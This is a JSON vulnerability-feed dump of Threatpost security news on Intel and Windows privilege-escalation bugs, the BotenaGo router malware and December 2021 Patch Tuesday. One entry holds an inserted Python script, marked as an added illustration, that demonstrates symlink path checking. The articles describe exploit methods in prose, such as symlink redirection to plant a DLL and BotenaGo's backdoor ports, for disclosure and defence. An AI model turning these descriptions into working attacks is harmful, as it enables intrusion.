"modified": "2021-11-29T17:47:10", "id": "THREATPOST:C8E47BBF9477DAA48006FB947AF7F4C7", "href": 
"https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-11-15T21:22:00", "description": "A security vulnerability in Intel chips opens the door for encrypted file access and espionage, plus the ability to bypass copyright protection for digital content.\n\nThat\u2019s according to Positive Technologies (PT), which found that the vulnerability (CVE-2021-0146) is a debugging functionality with excessive privileges, which is not protected as it should be.\n\nThe high-severity privilege-escalation issue is rated 7.1 out of 10 on the CVSS vulnerability-severity scale.\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\n\u201c[The] hardware allows activation of test or debug logic at runtime for some Intel processors which may allow an unauthenticated user to potentially enable escalation of privilege via physical access,\u201d according to Intel\u2019s advisory, [issued last week](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html>).\n\nIn terms of scope, the vulnerability affects the Pentium, Celeron and Atom processors of the Apollo Lake, Gemini Lake and Gemini Lake Refresh platforms. 
These chips power laptops, mobile devices, embedded systems, medical devices and a variety of internet of things (IoT) offerings.\n\n\u201cAccording to a study by Mordor Intelligence, Intel ranks fourth in the IoT chip market, while its Intel Atom E3900 series IoT processors, which also contain the CVE-2021-0146 vulnerability, are used by car manufacturers in more than 30 models, including, according to unofficial sources, in Tesla\u2019s Model 3,\u201d PT noted in a writeup shared with Threatpost.\n\nTo address the issue, users should install the [UEFI BIOS](<https://threatpost.com/intel-security-holes-cpus-bluetooth-security/166747/>) updates published by manufacturers of each piece of electronic equipment. The following processor models are affected:\n\n\n\nSource: Intel.\n\n## **CVE-2021-0146 Impact for End Users**\n\nWhen it comes to impact, an exploit would allow cybercriminals to extract a device\u2019s encryption key and gain access to information.\n\n\u201cOne example of a real threat is lost or stolen laptops that contain confidential information in encrypted form,\u201d said Mark Ermolov, a PT researcher who was credited with discovering the bug (along with PT\u2019s Dmitry Sklyarov and independent researcher Maxim Goryachy).\n\nThe vulnerability is also dangerous because it facilitates the extraction of the root encryption key used in Intel\u2019s Platform Trust Technology and Enhanced Privacy ID technologies, which are used to protect digital content from illegal copying, Ermolov added\n\n\u201cFor example, a number of Amazon e-book models use Intel EPID-based protection for digital rights management,\u201d he explained. 
\u201cUsing this vulnerability, an intruder might extract the root EPID key from a device (e-book), and then, having compromised Intel EPID technology, download electronic materials from providers in file form, copy and distribute them.\u201d\n\nAdditionally, an exploit could allow cyberattackers to conduct targeted attacks across the supply chain, Ermolov noted.\n\n\u201cFor example, an employee of an Intel processor-based device supplier could extract the Intel CSME firmware key and deploy spyware that security software would not detect,\u201d he said.\n", "cvss3": {}, "published": "2021-11-15T20:52:27", "type": "threatpost", "title": "High-Severity Intel Processor Bug Exposes Encryption Keys", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-15T20:52:27", "id": "THREATPOST:53A062956C31459E2846CD4C959DFD49", "href": "https://threatpost.com/intel-processor-bug-encryption-keys/176355/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:03", "description": "A partially unpatched security bug in Windows that could allow local privilege escalation from a regular user to System has not been fully addressed by Microsoft \u2013 but an unofficial micropatch from 0patch has hit the scene.\n\nThe bug ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) was originally disclosed and patched as part of Microsoft\u2019s 
[August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>). At the time, it was categorized as an arbitrary directory-deletion issue that was considered low-priority because an attacker would need to locally log into the targeted computer to exploit it, which, in theory, would allow the adversary to delete file folders anyway.\n\nHowever, the security researcher who discovered it, Abdelhamid Naceri, [soon uncovered](<https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>) that it could also be used for privilege escalation, which is a whole other ball of wax. Code running as Local System has full control of the machine, including any cached credentials that can be used to reach resources, databases and servers elsewhere on the network.\n\nNaceri also took a look at Microsoft\u2019s original patch, subsequently finding a bypass for it via a simple tweak to the exploit code he had developed, essentially reverting it to zero-day status.\n\n> CVE-2021-34484 bypass as 0day<https://t.co/W0gnYHxJ6B>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [October 22, 2021](<https://twitter.com/KLINIX5/status/1451558296872173577?ref_src=twsrc%5Etfw>)\n\n\u201cThe vulnerability lies in the User Profile Service, specifically in the code responsible for creating a temporary user profile folder in case the user\u2019s original profile folder is damaged or locked for some reason,\u201d explained 0patch\u2019s Mitja Kolsek in a [Thursday writeup](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>). 
\u201cAbdelhamid found that the process (executed as Local System) of copying folders and files from user\u2019s original profile folder to the temporary one can be attacked with symbolic links to create attacker-writable folders in a system location from which a subsequently launched system process would load and execute attacker\u2019s DLL.\u201d\n\nThe exploit is straightforward: An attacker would create a specially crafted symbolic link (a filesystem object that transparently redirects access to another file or folder, unlike a shell shortcut), then place it under the temporary user profile folder (C:\\Users\\TEMP).\n\nThen, when the User Profile Service copies a folder from the user\u2019s original profile folder as described by Kolsek, the symbolic link will redirect the copy and make the service create a folder containing a malicious library (DLL) payload somewhere else, where the attacker would normally not have permissions to create one.\n\n\u201cMicrosoft, even though believing the vulnerability only allowed for deletion of an arbitrarily \u2018symlinked\u2019 folder, made a conceptually correct fix: it checked whether the destination folder under C:\\Users\\TEMP was a symbolic link, and aborted the operation if so,\u201d explained Kolsek. 
\u201cThe incompleteness of this fix, as noticed by Abdelhamid, was in the fact that the symbolic link need not be in the upper-most folder (which Microsoft\u2019s fix checked), but in any folder along the destination path.\u201d\n\nThe micropatch fixes this by extending the security check for symbolic links to the entire destination path, calling the \u201cGetFinalPathNameByHandle\u201d function, which returns the fully resolved path of an open handle, so that a symbolic link anywhere along the path changes the result.\n\nIt should be noted that a workable exploit also requires attackers to be able to win a race condition (with unlimited attempts), since the system will be attempting to perform two operations (one malicious, one legitimate) at the same time. Also, even though Naceri said that \u201cit might be possible to [exploit] without knowing someone [else\u2019s] password,\u201d so far, having user credentials for the targeted computer remains an obstacle, Kolsek noted.\n\nThe bug affects Windows 10 (both 32 and 64 bit), versions v21H1, v20H2, v2004 and v1909; and Windows Server 2019 64 bit.\n\nMicrosoft hasn\u2019t released a timeline for updating its official patch and didn\u2019t immediately respond to a request for comment.\n
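To make Kolsek\u2019s point concrete, the following Python script is an added illustration, not code from 0patch, Naceri or Threatpost, of the difference between checking only the top-level destination folder and checking every component of the destination path. The directory names are constructed in a temporary directory and stand in for C:\Users\TEMP and a system folder; on Windows the resolved-path comparison would use GetFinalPathNameByHandle, and here os.path.realpath plays that role.

```python
import os
import shutil
import stat
import tempfile

# Added example: contrasts a top-level-only symlink check with a check of
# every component of the destination path. Folder names are made up to
# mirror a profile copy into C:\Users\TEMP; nothing here touches Windows APIs.


def top_level_only_check(root, dest):
    """Incomplete check: is the first folder below `root` a symlink?

    Models the original fix, which only tested the destination folder
    directly under C:\\Users\\TEMP.
    """
    rel = os.path.relpath(dest, root)
    first = rel.split(os.sep)[0]
    return os.path.islink(os.path.join(root, first))


def full_path_check(root, dest):
    """Complete check: reject if any component between `root` and `dest`
    is a symlink, or if the resolved destination escapes `root`.

    os.path.realpath resolves every link in the path, playing the role
    GetFinalPathNameByHandle plays on Windows.
    """
    rel = os.path.relpath(dest, root)
    cur = root
    for part in rel.split(os.sep):
        cur = os.path.join(cur, part)
        try:
            st = os.lstat(cur)          # lstat: inspect the link itself
        except FileNotFoundError:
            break                       # not created yet, cannot be a link
        if stat.S_ISLNK(st.st_mode):
            return True
    real_root = os.path.realpath(root)
    real_dest = os.path.realpath(dest)
    return os.path.commonpath([real_root, real_dest]) != real_root


def build_scenarios():
    """Build three destination layouts in a temp dir and run both checks.

    Returns {name: (top_level_only_rejects, full_path_rejects)}.
    """
    base = tempfile.mkdtemp(prefix="profile-copy-lab-")
    try:
        root = os.path.join(base, "Users", "TEMP")               # copy destination
        system_dir = os.path.join(base, "Windows", "System32")   # attacker's goal
        os.makedirs(root)
        os.makedirs(system_dir)

        # 1. Link directly under root: the case the original fix caught.
        os.symlink(system_dir, os.path.join(root, "AppData"), target_is_directory=True)
        top_link = os.path.join(root, "AppData", "Local")

        # 2. Real folder under root, link one level down: the bypass.
        real_top = os.path.join(root, "Documents")
        os.makedirs(real_top)
        os.symlink(system_dir, os.path.join(real_top, "Local"), target_is_directory=True)
        nested_link = os.path.join(real_top, "Local", "Microsoft")

        # 3. Plain nested folders: must be allowed by both checks.
        benign = os.path.join(root, "Pictures", "Camera Roll")
        os.makedirs(benign)

        return {
            name: (top_level_only_check(root, dest), full_path_check(root, dest))
            for name, dest in (
                ("top_level_link", top_link),
                ("nested_link", nested_link),
                ("benign", benign),
            )
        }
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for name, (top_only, full) in build_scenarios().items():
        print(f"{name:15s} top-level check rejects: {str(top_only):5s} "
              f"full-path check rejects: {full}")
```

The nested case is the one that matters: the top-level check passes it, the full-path check rejects it. A real implementation would also need to hold the handle it validated and perform the copy through that handle, since a check on a path string followed by a separate open is exactly the race window the article mentions.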
", "cvss3": {}, "published": "2021-11-12T19:49:05", "type": "threatpost", "title": "Windows 10 Privilege-Escalation Zero-Day Gets Unofficial Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T19:49:05", "id": "THREATPOST:84909E392F4171398A52202CCC4E215A", "href": "https://threatpost.com/windows-10-privilege-escalation-zero-day-unofficial-fix/176313/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:33", "description": "Newly surfaced malware that is difficult to detect and written in Google\u2019s open-source programming language has the potential to [exploit millions](<https://threatpost.com/bug-iot-millions-devices-attackers-eavesdrop/168729/>) of routers and [IoT devices](<https://threatpost.com/iot-attacks-doubling/169224/>), researchers have found.\n\nDiscovered by researchers at AT&T AlienLabs, BotenaGo can exploit more than 30 different vulnerabilities to attack a target, Ofer Caspi, a security researcher at Alien Labs, wrote in a [blog post](<https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits>) published Thursday.\n\nThe malware, which is written in [Golang](<https://golang.org/>) (a language Google released publicly in 2009), works by creating a backdoor to the device. 
It then waits to either receive a target to attack from a remote operator through port 19412 or from another related module running on the same machine, he wrote.\n\nGolang, also known as Go, is aimed at simplifying how software is built by making it easy for developers to compile the same code for different systems. This feature may be the reason why it\u2019s caught on with malware developers in the last few years, since it also makes it easier for attackers to spread malware on multiple operating systems, Caspi wrote.\n\nIndeed, [research from Intezer](<https://www.intezer.com/blog/malware-analysis/year-of-the-gopher-2020-go-malware-round-up/>), which offers a platform for analyzing malware, suggests that there has been a 2,000 percent increase in malware code written in Go being found in the wild, he wrote.\n\nResearchers said at this time they don\u2019t know which threat actor or actors developed BotenaGo, nor the full scale of devices that are vulnerable to the malware. So far, antivirus protections also don\u2019t seem to recognize the malware, sometimes misidentifying it as a [variant of Mirai malware](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), Caspi wrote.\n\n## **Setting Up the Attack**\n\nBotenaGo commences its work with some exploratory moves to see if a device is vulnerable to attack, Caspi wrote. It starts by initializing global infection counters that will be printed to the screen, informing the attacker about total successful infections. The malware then looks for the \u2018dlrs\u2019 folder from which to load shell script files. 
If this folder is missing, BotenaGo stops the infection process.\n\nIn its last step before fully engaging, BotenaGo calls the function \u2018scannerInitExploits\u2019, \u201cwhich initiates the malware attack surface by mapping all offensive functions with its relevant string that represent the targeted system,\u201d Caspi wrote.\n\nTo establish whether a device is vulnerable, BotenaGo first queries the target with a simple \u201cGET\u201d request, then matches the returned data against each system signature that was mapped to an attack function, and delivers the exploit on a match.\n\nResearchers detail several possible attacks that can be carried out using this query. In one, the malware maps the string \u201cServer: Boa/0.93.15\u201d to the function \u201cmain_infectFunctionGponFiber,\u201d which attempts to exploit a vulnerable target, Caspi wrote.\n\nThis allows the attacker to execute an OS command via a specific web request using a vulnerability tracked as [CVE-2020-8958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8958>). A [SHODAN search](<https://www.shodan.io/>) turned up nearly 2 million devices presenting that banner, and thus potentially vulnerable to this attack alone, he wrote.\n\n\u201cIn total, the malware initiates 33 exploit functions that are ready to infect potential victims,\u201d Caspi wrote. A full list of the vulnerabilities that BotenaGo can exploit is included in the post.\n\n## **Backdooring Devices to Execute Commands**\n\nThere are two different ways that the malware can receive commands to target victims, researchers found. 
One is to open backdoor listening ports (31421 and 19412) that are used in an attack scenario, Caspi wrote.\n\n\u201cOn port 19412 it will listen to receive the victim IP,\u201d he wrote. \u201cOnce a connection with information to that port is received, it will loop through mapped exploit functions and execute them with the given IP.\u201d\n\nThe second way BotenaGo can receive a target command is by listening on standard input (the terminal) for user input, getting the command to the device that way, Caspi explained.\n\n\u201cFor example, if the malware is running locally on a virtual machine, a command can be sent through telnet,\u201d he wrote.\n\n## **Dangers to Corporate Network**\n\nGiven its ability to exploit devices connected over internet ports, BotenaGo can be potentially dangerous to corporate networks by gaining access through vulnerable devices, said one security professional.\n\n\u201cBad actors, such as those at work here, love to exploit these devices to gain access to the internal networks behind them, or just to use it as a platform from which to launch other attacks,\u201d observed Erich Kron, security awareness advocate at security firm [KnowBe4](<http://www.knowbe4.com/>), in an email to Threatpost.\n\nAttacks that can be launched once a hacker takes over a device and piggybacks on the network it\u2019s using include [DDoS attacks](<https://threatpost.com/ddos-attacks-records-q3/176082/>), which can lead to extortion of money from victims, he said. Attackers also can host and spread malware using a victim\u2019s internet connection, Kron observed.\n\nGiven the number of vulnerabilities of which it can take advantage, BotenaGo also shows the importance of keeping IoT and routers updated with the latest firmware and patches to avoid leaving them available to exploit, he added.\n
", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-12T13:14:44", "type": "threatpost", "title": "Millions of Routers, IoT Devices at Risk from BotenaGo Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8958", "CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T13:14:44", "id": "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "href": "https://threatpost.com/routers-iot-open-source-malware/176270/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T14:21:48", "description": 
"Microsoft has addressed a zero-day vulnerability that was exploited in the wild to deliver Emotet, Trickbot and more in the form of fake applications.\n\nThe patch came as part of the computing giant\u2019s December Patch Tuesday update, which included a total of 67 fixes for security vulnerabilities. The patches cover the waterfront of Microsoft\u2019s portfolio, affecting ASP.NET Core and Visual Studio, Azure Bot Framework SDK, Internet Storage Name Service, Defender for IoT, Edge (Chromium-based), Microsoft Office and Office Components, SharePoint Server, PowerShell, Remote Desktop Client, Windows Hyper-V, Windows Mobile Device Management, Windows Remote Access Connection Manager, TCP/IP, and the Windows Update Stack.\n\nSeven of the bugs addressed are rated critical, six were previously disclosed as zero-days and 60 are considered \u201cimportant.\u201d\n\nThe update brings the total number of CVEs patched by Microsoft this year to 887, which is down 29 percent in volume from a very busy 2020.\n\n## **Zero-Day Exploited in Wild**\n\nThe zero-day ([CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>)) is an important-rated spoofing vulnerability in the Windows AppX Installer, which is a utility for side-loading Windows 10 apps, available on the App Store.\n\nKevin Breen, director of cyber-threat research at Immersive Labs, explained that the bug \u201callows an attacker to create a malicious package file and then modify it to look like a legitimate application, and has been used to deliver Emotet malware, which [made a comeback](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) this year.\u201d\n\nBreen warned, \u201cthe patch should mean that packages can no longer be spoofed to appear as valid, but it will not stop attackers from sending links or attachments to these files.\u201d\n\nPrior to its fix today, the bug was seen in multiple attacks associated with Emotet, TrickBot and Bazaloader, according to Satnam 
Narang, staff research engineer at Tenable.\n\n\u201cTo exploit this vulnerability, an attacker would need to convince a user to open a malicious attachment, which would be conducted through a phishing attack,\u201d he explained via email. \u201cOnce exploited, the vulnerability would grant an attacker elevated privileges, particularly when the victim\u2019s account has administrative privileges on the system.\u201d\n\nIf patching isn\u2019t an option, Microsoft has provided some workarounds to protect against the exploitation of this vulnerability.\n\n## **Other Publicly Known Microsoft Vulnerabilities**\n\nIt\u2019s worth noting that Microsoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a privilege-escalation vulnerability in Windows Installer, for which [there\u2019s been an exploit circulating](<https://threatpost.com/attackers-target-windows-installer-bug/176558/>), and, reportedly, active targeting by attackers \u2013 even though Microsoft said it has seen no exploitation.\n\n\u201cThis appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation-of-privilege vulnerability in Windows Installer that was reportedly fixed in November,\u201d Narang said. \u201cHowever, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.\u201d\n\nBreen noted that this kind of vulnerability is highly sought after by attackers looking to move laterally across a network.\n\n\u201cAfter gaining the initial foothold, achieving administrator-level access can allow attackers to disable security tools and deploy additional malware or tools like Mimikatz,\u201d he said. 
\u201cAlmost all ransomware attacks in the last year employed some form of privilege escalation as a key component of the attack prior to launching ransomware.\u201d\n\nFour other bugs were listed as \u201cpublicly known\u201d but not exploited, all rated important and allowing privilege escalation:\n\n * [CVE-2021-43240](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43240>), in NTFS Set Short Name\n * [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>), in Windows Encrypting File System (EFS)\n * [CVE-2021-43880](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43880>), in Windows Mobile Device Management\n * [CVE-2021-41333](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41333>), in Windows Print Spooler\n\nThe update does not address CVE-2021-24084, an unpatched Windows security vulnerability [disclosed in late November](<https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/>), which could allow information disclosure and local privilege escalation (LPE).\n\n## **Critical-Rated Microsoft Security Bugs for December**\n\n 1. ### **CVE-2021-43215 in iSNS Server**\n\nThe first critical bug ([CVE-2021-43215](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43215>)) to cover allows remote code-execution (RCE) on the Internet Storage Name Service (iSNS) server, which enables automated discovery and management of iSCSI devices on a TCP/IP storage network. 
It rates 9.8 out of 10 on the vulnerability-severity scale.\n\nThe bug can be exploited if an attacker sends a specially crafted request to an affected server, according to Microsoft\u2019s advisory.\n\n\u201cIn other words, if you\u2019re running a storage-area network (SAN) in your enterprise, you either have an iSNS server or you configure each of the logical interfaces individually,\u201d said Trend Micro Zero Day Initiative researcher Dustin Childs, in a [Tuesday blog](<https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review>). \u201cIf you have a SAN, prioritize testing and deploying this patch.\u201d\n\nBreen concurred that it\u2019s critical to patch quickly if an organization operates iSNS services.\n\n\u201cRemember that this is not a default component, so check this before you bump it up the list,\u201d he said via email. However, \u201cas this protocol is used to facilitate data storage over the network, it would be a high priority target for attackers looking to damage an organization\u2019s ability to recover from attacks like ransomware. These services are also typically trusted from a network perspective \u2013 which is another reason attackers would choose this kind of target.\u201d\n\n 2. ### **CVE-2021-43907 in Visual Studio Code WSL Extension**\n\nAnother 9.8-out-of-10-rated bug is [CVE-2021-43907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43907>), an RCE issue in Visual Studio Code WSL Extension that Microsoft said can be exploited by an unauthenticated attacker, with no user interaction. It didn\u2019t provide further details.\n\n\u201cThis impacted component lets users use the Windows Subsystem for Linux (WSL) as a full-time development environment from Visual Studio Code,\u201d Childs explained. \u201cIt allows you to develop in a Linux-based environment, use Linux-specific tool chains and utilities, and run and debug Linux-based applications all from within Windows. 
This sort of cross-platform functionality is used by many in the DevOps community.\u201d\n\n 3. ### **CVE-2021-43899 in Microsoft 4K Wireless Display Adapter**\n\nThe third and final bug rated 9.8 on the CVSS scale is [CVE-2021-43899](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43899>), which also allows RCE on an affected device, if the attacker has a foothold on the same network as the Microsoft 4K Wireless Display Adapter. Exploitation is a matter of sending specially crafted packets to the affected device, according to Microsoft.\n\n\u201cPatching this won\u2019t be an easy chore,\u201d Childs said. \u201cTo be protected, users need to install the Microsoft Wireless Display Adapter application from the Microsoft Store onto a system connected to the Microsoft 4K Wireless Display Adapter. Only then can [they] use the \u2018Update & Security\u2019 section of the app to download the latest firmware to mitigate this bug.\u201d\n\n 4. ### **CVE-2021-43905 in Microsoft Office**\n\nAnother critical RCE bug ([CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>)) exists in the Microsoft Office app; it rates 9.6 on the CVSS vulnerability-severity scale, and Microsoft marked it as \u201cexploitation more likely.\u201d\n\n\u201cVery little is given away in the advisory to identify what the immediate risk is \u2013 it simply states the affected product as \u2018Office App,\u2019\u201d Breen noted. \u201cThis can make it difficult for security teams to prioritize or put mitigations in place if quick patching is not available \u2013 especially when security teams are already tied down with other critical patching.\u201d\n\nHowever, Aleks Haugom, researcher at Automox, said it should be a priority for patching.\n\n\u201cAs a low-complexity vulnerability, an attacker can expect repeated results,\u201d he said in a [Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-on-december-2021-patch-tuesday-release>). 
\u201cAlthough Microsoft has not disclosed exactly what user interaction is required for the attacker to succeed, they have confirmed that the Preview Pane is not an attack vector. Given that this threat can impact resources beyond the security scope managed by the security authority, immediate remediation actions are advised.\u201d\n\n 5. ### **CVE-2021-42310 in Microsoft Defender for IoT**\n\nOne of 10 issues found in Defender for IoT, this bug ([CVE-2021-42310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42310>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cA password reset request consists of a signed JSON document, a signing certificate, and an intermediate certificate that was used to sign the signing certificate,\u201d explained Childs. \u201cThe intermediate certificate is supposed to chain up to a root CA certificate built into the appliance. Due to a flaw in this process, an attacker can reset someone else\u2019s password. Patching these bugs requires a sysadmin to [take action](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-manage-the-on-premises-management-console#update-the-software-version>) on the device itself.\u201d\n\nThe other nine bugs in the platform include seven other RCE vulnerabilities, one elevation of privilege vulnerability and one data disclosure vulnerability, all rated \u201cimportant.\u201d\n\n 6. ### **CVE-2021-43217 in the Windows Encrypting File System (EFS)**\n\nThis bug ([CVE-2021-43217](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43217>)) allows RCE and rates 8.1 on the CVSS scale.\n\n\u201cAn attacker could cause a buffer overflow that would lead to unauthenticated non-sandboxed code execution, even if the EFS service isn\u2019t running at the time,\u201d Childs explained. 
\u201cEFS interfaces can trigger a start of the EFS service if it is not running.\u201d\n\nJay Goodman, in the Automox posting, noted that it can be chained with the publicly disclosed elevation of privilege vulnerability in EFS (CVE-2021-43893, listed above) and thus presents a special threat.\n\n\u201cWhile either of these vulnerabilities constitute impactful disclosures that need to be handled quickly, the combination of the two in a near universal service critical to securing and protecting data creates a unique situation,\u201d he said. \u201cAttacks could use the combination of RCE with privilege elevation to quickly deploy, elevate and execute code on a target system with full system rights. This can allow attackers to easily take full control of the system as well as create a base of operations within the network to spread laterally.\u201d\n\nIn other words: This is a critical pair of vulnerabilities to address as soon as possible to minimize organizational risk.\n\n 7. ### **CVE-2021-43233 in Remote Desktop Client**\n\nThe flaw ([CVE-2021-43233](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43233>)) allows RCE and rates 7 on the CVSS scale. It\u2019s listed as \u201cexploitation more likely.\u201d\n\n\u201cThis one\u2026would likely require a social engineering or phishing component to be successful,\u201d Breen explained. \u201cA similar vulnerability, [CVE-2021-38666](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38666>), was reported and patched in November. 
While it was also marked as \u2018exploitation more likely,\u2019 thankfully there have been no reports of proof-of-concept code or of it being exploited in the wild, which goes to show how important it is to make your own risk-based approach to prioritizing patches.\u201d\n\nAutomox researcher Gina Geisel emphasized the bug\u2019s high complexity for exploitation.\n\n\u201cTo exploit this vulnerability, an attacker requires control of a server and then must convince users to connect to it, through social engineering, DNS poisoning or using a man-in-the-middle (MITM) technique, as examples,\u201d she said. \u201cAn attacker could also compromise a legitimate server, host malicious code on it, and wait for the user to connect.\u201d\n\n## **Other Microsoft Bugs of Note for December**\n\nChilds also flagged [CVE-2021-42309](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42309>), an RCE issue in Microsoft SharePoint Server, as a vulnerability to prioritize. It allows an attacker to bypass the restriction against running arbitrary server-side web controls.\n\n\u201cThe vulnerability allows a user to elevate and execute code in the context of the service account,\u201d he explained. 
\u201cAn attacker would need \u2018Manage Lists\u2019 permissions on a SharePoint site, but by default, any authorized user can create their own new site where they have full permissions.\u201d\n\nHe said the issue is similar to the previously patched [CVE-2021-28474](<https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict>), except that the unsafe control \u201cis \u2018smuggled\u2019 in a property of an allowed control.\u201d\n\nOperating system bugs should be prioritized, researchers added.\n\n\u201cThe disclosures include a functional example in the case of the Print Spooler, proof-of-concept for the NTFS and Windows Installer vulnerabilities, so there is some cause to put urgency on the OS updates this month,\u201d Chris Goettl, vice president of product management at Ivanti, told Threatpost.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-14T22:21:35", "type": "threatpost", "title": "Actively Exploited Microsoft Zero-Day Allows App Spoofing, Malware Delivery", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-24084", "CVE-2021-28474", "CVE-2021-38666", "CVE-2021-41333", "CVE-2021-41379", "CVE-2021-42309", "CVE-2021-42310", "CVE-2021-43215", "CVE-2021-43217", "CVE-2021-43233", "CVE-2021-43240", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43893", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907"], "modified": "2021-12-14T22:21:35", "id": "THREATPOST:DD8030D774C6B1FBB3DEDAFC836B8B80", "href": "https://threatpost.com/exploited-microsoft-zero-day-spoofing-malware/177045/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-12-01T05:28:01", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/Microsoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf>)\n\nAn improperly patched Windows vulnerability (CVE-2021-24084) can lead to local privilege escalation and information disclosure. The vulnerability was reported in October 2020 and addressed in Microsoft\u2019s February 2021 Patch Tuesday, but the patch can be bypassed, making the bug once again effectively a zero-day caused by improper patching.\n\nCVE-2021-24084 was an information disclosure vulnerability in the Windows Mobile Device Management component, but it was later found to be exploitable for local privilege escalation, allowing an attacker to gain admin privileges and read arbitrary files without the permissions to do so. All versions of Windows 10, even with the November 2021 updates installed, are affected by this vulnerability.\n\nAfter examining Microsoft's fix, [Abdelhamid Naceri](<https://github.com/klinix5/InstallerFileTakeOver>), the security researcher who discovered this 